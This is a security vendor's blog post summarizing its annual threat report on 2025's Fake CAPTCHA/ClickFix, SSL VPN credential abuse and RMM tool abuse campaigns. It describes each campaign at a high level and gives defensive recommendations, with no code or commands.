The 3 Cyber Attack Campaigns That Defined 2025 and What They Mean for 2026 

There’s a version of the cybersecurity threat narrative that focuses on escalation: more sophisticated attackers, more complex exploits, more advanced tooling. That version makes for good headlines. It’s also increasingly disconnected from what’s actually happening. 

What the Blackpoint SOC observed across thousands of incidents in 2025 tells a different story. The most effective attacks last year were built on familiarity. Attackers logged in with real credentials instead of forcing their way through the perimeter. They used the same remote access tools your IT team uses, and mimicked the browser prompts your users interact with every day. 

That’s the real shift. Familiarity, deployed as a weapon. And it changes the nature of the problem defenders need to solve. 

Which Industries Are Most Targeted by Cyberattacks? 

The organizations most frequently targeted last year share a common profile: they operate under tight timelines, they hold data worth stealing, and they often serve as access points into other organizations. Our SOC observed incidents across virtually every vertical, but five sectors absorbed the highest volume. 

Source: 2026 Annual Threat Report, Blackpoint Cyber

What makes these numbers significant is what they represent structurally. A manufacturer going offline creates ripple effects across supply chains. A compromised MSP can become a passageway into every client environment it manages. Attackers understand the interconnected nature of these sectors, and they’re exploiting it deliberately. 

The Three Biggest Cyber Attack Trends of 2025 and 2026 

Three campaigns drove the bulk of what our SOC handled last year. Each one is distinct in execution but identical in logic: find what an organization already trusts and use it. 

Source: 2026 Annual Threat Report, Blackpoint Cyber

What Is a Fake CAPTCHA or ClickFix Attack? 

The most unsettling thing about Fake CAPTCHA and ClickFix attacks is how ordinary they look in the moment. 

A user visits a website, often a legitimate one that has been quietly compromised, and encounters a verification prompt styled to look like a Cloudflare or Google security check. The prompt asks them to press Win+R and paste a short command to confirm they’re human. It looks like the dozens of similar interactions they’ve completed without incident. They do it. In that single action, the attacker gains direct code execution through native Windows utilities.  

The Fake CAPTCHA and ClickFix campaigns accounted for 58% of all identifiable incidents last year because it sidesteps a core challenge every attacker faces: security controls are built to catch malicious-looking behavior. ClickFix gets around that entirely by convincing users to run the code themselves, through tools the system already trusts. 

The payloads delivered through this vector in 2025 ranged from credential stealers like Lumma and RedLine to remote access tools and loaders designed to pull down additional malware after the initial foothold. One evolution our team tracked closely was a technique called Etherhiding, where attackers moved their payload delivery logic into blockchain smart contracts. These contracts are immutable once deployed, so updating attacker infrastructure across thousands of compromised sites became a single operation. It’s a meaningful indicator of how organized and resilient these campaigns have become. 

The most effective defenses are behavioral. Restricting the Windows Run dialog via Group Policy for standard users removes the primary execution path. Monitoring for clipboard-to-PowerShell command chains catches execution when policy restrictions are unavailable. Training users to recognize that legitimate sites will ask for a login or a CAPTCHA solve, never a command to paste into their own computer, remains one of the most direct mitigations available. 

Why Is SSL VPN Abuse Still a Top Attack Vector in 2026? 

In 2025, 33% of identifiable incidents involved SSL VPN abuse. SSL VPNs present a structural challenge for defenders: they must be reachable from the internet to function. That requirement also makes them a permanent fixture on every attacker’s target list. 

What our data showed last year was primarily credential abuse rather than sophisticated exploitation of novel vulnerabilities. Stolen username and password. Successful authentication. A session indistinguishable from a legitimate remote employee checking in. The attacker arrived through the front door. 

This is a network architecture problem as much as it is a credential security problem. In many organizations, a remote VPN session can reach domain controllers, backup infrastructure, and management interfaces with full freedom of movement. A single stolen credential becomes effectively unlimited in scope. Segmenting VPN address pools, enforcing MFA without legacy fallbacks, and treating authentication anomalies as high-priority signals are the structural controls that change that calculus. 

Patching edge devices matters, and both SonicWall and Fortinet had critical vulnerabilities actively exploited in 2025. Patching a single CVE, though, leaves the underlying condition intact: once inside an overpermissioned network, attackers have significant room to operate. 

How Do Attackers Abuse RMM Tools? 

Throughout 2025, 30% of identifiable incidents involved RMM tool abuse. Remote Monitoring and Management tools are, by design, a useful attacker utility. They provide persistent remote access, communicate over standard ports, generate traffic that resembles normal IT operations, and are expected to be present in most managed environments. When an attacker installs one, it registers as another remote session in an environment that already has several. 

Campaigns our team tracked last year used phishing emails disguised as invoices, payroll documents, and government notices to trick users into running what appeared to be legitimate installers. The more resilient variant involved a layered approach: the initial malicious RMM tool was programmed to immediately install a second one from a different vendor, hosted on attacker-controlled infrastructure. Even when the first was identified and removed, the second was already in place, sitting quietly in an environment where multiple RMM tools legitimately coexist. 

Distinguishing an authorized deployment from a rogue one requires going beyond presence to context. Where was it installed from? Under what account? Does it match the expected deployment pattern for that device? Those questions demand human investigation, which is precisely why this attack pattern is so durable, and why a human led, 24/7 SOC makes all the difference.  

The most effective structural control is a defined and enforced software inventory: knowing exactly which RMM tools are approved, where they should exist, and surfacing anything that falls outside that baseline. Combined with application controls that block installation from user-writable paths and monitoring for outbound connections to unusual domains, it removes the ambiguity these campaigns rely on. 

What Do These Cyber Threats Have in Common? 

The throughline across all three campaigns is the same: attackers are exploiting trusted tools and familiar workflows rather than novel exploits or zero-day vulnerabilities. What these attacks require is an organization whose defenses are calibrated to catch overtly malicious behavior, leaving activity dressed in familiar clothes to pass through unquestioned. 

That distinction matters more than any individual tactic. Security programs built around signature detection and perimeter defense will keep missing the activity these campaigns produce, because the activity looks right. A VPN login looks like a VPN login. An RMM tool looks like an RMM tool. A CAPTCHA looks like a CAPTCHA. 

Context is what breaks the pattern. Human-led detection, operating in real time with full environmental context, is what surfaces those signals. It remains the most decisive advantage defenders have. The response to 2025 is a reorientation around what “routine” actually means, and a willingness to question it. 

Go Deeper in the 2026 Annual Threat Report 

This post covers the shape of the problem. The 2026 Annual Threat Report covers what’s behind it: full attack chain walkthroughs for each campaign, how Adversary-in-the-Middle phishing is compromising Microsoft 365 environments by targeting authenticated sessions rather than credentials, how ransomware groups scaled victim listings, the full vulnerability landscape from 2025, and proactive defense frameworks built directly from what our SOC observed in the field. Download the report here.